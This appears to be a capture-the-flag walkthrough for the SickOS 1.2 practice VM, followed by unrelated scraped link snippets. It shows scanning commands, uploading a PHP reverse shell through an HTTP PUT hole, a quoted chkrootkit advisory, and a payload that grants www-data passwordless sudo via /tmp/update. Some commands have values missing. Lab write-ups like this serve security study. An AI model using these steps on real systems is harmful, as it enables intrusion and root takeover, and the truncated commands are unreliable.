SickOS 1.2 Walkthrough

Preparation:

Down load the SickOS virtual machines from the following website:

https://www.vulnhub.com/entry/sickos-12,144/

1. Scan the network to find the IP of SickOS server. The IP address of the SickOS is 10.0.0.31.

netdiscover -r 10.0.0.0/

2. Perform the TCP/UDP scan to the SickOS server to find potential vulnerabilities.

TCP Scan 1:

nmap -Pn -sS --stats-every 3m --max-retries  --max-scan-delay  --defeat-rst-ratelimit -T4 -p1- -oN /root/Delete/tcp1.txt 10.0.0.31

TCP Scan 2:

UDP Scan:

3. Browse the website(http://10.0.0.31) through Firefox. And nothing special found on the source page.

<html>

<img src="blow.jpg">

</html>

4. Run the tool nikto or dirbust

nikto -h 10.0.0.31

dirbuster

Browse the website(http://10.0.0.31/test/) through Firefox. But nothing found.

5. Try to use the tool curl to find some vulnerabilities.

curl -v -X OPTIONS http://10.0.0.31

Find some vulnerabilities here. We can put some reverse web shell to the website.

curl -v -X OPTIONS http://10.0.0.31/test

Modified and save the php-reverse-shell.php file.

6. Try to use Nmap to upload the reverse-shell file to the target website.

nmap -p  10.0.0.31 --script http-put --script-args http-put.url='/test/exploit.php',http-put.file='php-reverse-shell.php'

7. Listening on port 443 and browse the exploit website.

Now we connect  to the SickOS server.

8. Find the chkrootkit file in the folder /etc/cron.daily.

ls -l /etc/cron.daily

Find the version of chkrootkit.

dpkg -l | grep chkrootkit

Search  chkrootkit related exploit method on Kali Linux.

searchsploit chkrootkit

cat /usr/share/exploitdb/exploits/linux/local/.txt

We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec). The vulnerability is located in the function slapper() in the
shellscript chkrootkit: #
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port= if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
} The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment. Steps to reproduce: - Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0) Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file. If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this. Suggested fix: Put quotation marks around the assignment. file_port="$file_port $i" I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.

Prepare the exploit:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Make sure we have the full privileges of the update file.

9. Run the run-parts command and press Enter twice. Finally, execute the command - sudo su.

Ahaaa! Get to root privilege.

run-parts /etc/cron.daily

sudo su

Try harder, until success.

OSCP Learning Notes - Capstone(4)的更多相关文章

  1. OSCP Learning Notes - Capstone(3)

    DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website ...

  2. OSCP Learning Notes - Capstone(2)

    BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: ...

  3. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  4. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  5. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  6. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  7. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  8. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

  9. OSCP Learning Notes - Enumeration(4)

    DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally use ...

随机推荐

  1. java锁总结

    1.公平锁与非公平锁 公平锁:指多个线程在等待同一个锁时,必须按照申请锁的先后顺序来依次获得锁. 优点:等待锁的线程不会饿死.缺点:整体效率相对较低. 非公平锁:可以抢占,即如果在某个时刻有线程需要获 ...

  2. cocos2dx Mac平台 打印长字符串,游戏卡死

    1,打开了输出控制台,输出卡死的解决方案: 打开控制台: game -console enable 关闭控制台: game -console false 修改文件 ConsoleWindowContr ...

  3. 关于HTTP 请求方式: GET和POST的比较的本质

    什么是HTTP? 超文本传输协议(HyperText Transfer Protocol -- HTTP)是一个设计来使客户端和服务器顺利进行通讯的协议. HTTP在客户端和服务器之间以request ...

  4. [ C++ ] 勿在浮沙筑高台 —— 内存管理(18~31p) std::alloc

    部分内容个人感觉不是特别重要,所以没有记录了.其实还是懒 embedded pointers 把对象的前四字节当指针用. struct obj{ struct obj *free_list_link; ...

  5. 尚学堂 215 在java中执行JavaScript代码

    package com.bjsxt.test; import java.io.FileReader; import java.net.URL; import java.util.List; impor ...

  6. html+css快速入门教程(4)

    练习 1.网易考拉下拉菜单 2.爱奇艺新闻 3.ps滤镜菜单 4.爱奇艺列表 7 布局 7.1 盒子模型 网页设计,首先要做好整体的布局,网页布局就是将不同的元素按照一定的规则放置在浏览器的不同位置, ...

  7. Syntax error, insert "}" to complete MethodBody

    jsp中代码在Eclipse中打开正常,导入项目导入MyEclipse后显示如下异常: Syntax error, insert "}" to complete MethodBod ...

  8. python三大神器之fabric

    Fabric Fabric是一个python的远程执行shell的库,同时它也是一个命令行工具.它提供了丰富的同 SSH 交互的接口,可以用来在本地或远程机器上自动化.流水化地执行 Shell 命令. ...

  9. 题解 P1144 【最短路计数】

    这道题用一次SPFA就可以过了.在求最短路的同时,对答案进行统计即可. 实现: \(dis_i\)表示从1到\(i\)的最短路(实在还是不懂的话看程序吧). 当\(dis_i>dis_j+1\) ...

  10. html实体引用

    原义字符 等价字符引用 < < > > " " ' &apos; & &